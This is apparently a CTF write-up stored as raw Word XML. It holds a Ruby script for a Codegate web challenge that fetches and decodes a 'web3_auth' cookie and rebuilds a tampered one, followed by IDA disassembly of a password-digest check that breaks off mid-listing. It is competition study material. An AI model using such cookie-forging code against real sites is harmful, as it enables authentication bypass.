    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>require 'net/http'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Net::HTTP.version_1_2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>class String</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def hex</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a = []</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self.each_char{|c|</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a &lt;&lt; c</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a.map {|v|</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sprintf("\\x%02x", v[0])</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}.join</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end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>def parse_cookie(val)</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url_enc = val.split(";")[0].split("=")[1]</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#pp url_enc</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d = CGI::unescape(url_enc)</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#puts d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pP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d0 = d.split("|")[0]</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d1 = d.split("|")[1]</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d0 = d0.unpack('m')[0]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pP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[d0, d1]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>def make_cookie(d0, d1)</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val = "web3_auth="</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d = [d0].pack('m').chomp + "|" + d1</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#pp d</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val += CGI::escape(d)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pP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val</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>def get(http, d0, d1)</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req = Net::HTTP::Get.new('/3ea2d867e871fdab011d066758489953/web3.php')</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sleep(0.5)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pP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#pp make_cookie(d0, d1)</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req["Cookie"] = make_cookie(d0, d1)</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res, body = http.request(req)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pP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#pp body</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pP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[res, body]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>def get_cookie(http, username)</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 post form</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res, body = http.post(</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'/3ea2d867e871fdab011d066758489953/web3.php',</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'username=' + CGI::escape(username)</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pP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val = nil</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d0 = nil</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d1 = nil</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pP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 </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res.each{|k, v|</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#puts "#{k}, #{v}"</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if k == "set-cookie"</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val = v</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d0, d1 = parse_cookie(val)</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end</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pP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[d0, d1, body]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>def usage</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$stderr.puts("usage : prob10.rb [username]")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">  exit(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t># main</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>usage if ARGV.size == 0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>http = Net::HTTP.start('ctf1.codegate.org', 80)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>puts "==== POST username ====="</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>d0, d1, body = get_cookie(http, ARGV[0])</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>puts "d0=#{d0.hex} (size:#{d0.size})"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>puts "d1=#{d1} (hex:#{sprintf("%08x",d1.to_i)}) (size:#{d1.size})"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>pp body</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>#puts "==== GET html ====="</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>#res, body = get(http, d0, d1)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00C03E31" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>#pp body</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB4B4B" w:rsidRPr="00921462" w:rsidRDefault="00EB4B4B" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00921462" w:rsidRDefault="00921462" w:rsidP="00EB4B4B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>-analysis 13--</w:t>
      </w:r>
      <w:r w:rsidR="00C03E31">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>--</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.text:08048CCD check_pw_digest proc near               ; CODE XREF: cmd_download+128p</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.text:08048CCD</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.text:08048CCD _hash           = dword ptr -80h</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.text:08048CCD format          = dword ptr -7Ch</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.text:08048CCD s1              = dword ptr -78h</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.text:08048CCD sha1_ctx        = byte ptr -74h</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.text:08048CCD var_C           = dword ptr -0Ch</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.text:08048CCD password        = dword ptr  8</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.text:08048CCD hash            = dword ptr  0Ch</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.text:08048CCD</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.text:08048CCD                 push    ebp</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.text:08048CCE                 mov     ebp, esp</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.text:08048CD0                 sub     esp, 98h</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.text:08048CD6                 mov     eax, [ebp+password]</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.text:08048CD9                 mov     [ebp+format], eax</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.text:08048CDC                 mov     eax, [ebp+hash] ; file_table</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.text:08048CDF                 mov     [ebp+_hash], eax</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.text:08048CE2                 mov     eax, large gs:14h</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.text:08048CE8                 mov     [ebp+var_C], eax</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.text:08048CEB                 xor     eax, eax</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.text:08048CED                 lea     eax, [ebp+sha1_ctx]</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.text:08048CF0                 mov     [esp], eax</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.text:08048CF3                 call    sha1_init</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.text:08048CF8                 mov     eax, [ebp+format]</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.text:08048CFB                 mov     [esp], eax      ; s</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.text:08048CFE                 call    _strlen</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.text:08048D03                 mov     edx, [ebp+format]</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.text:08048D06                 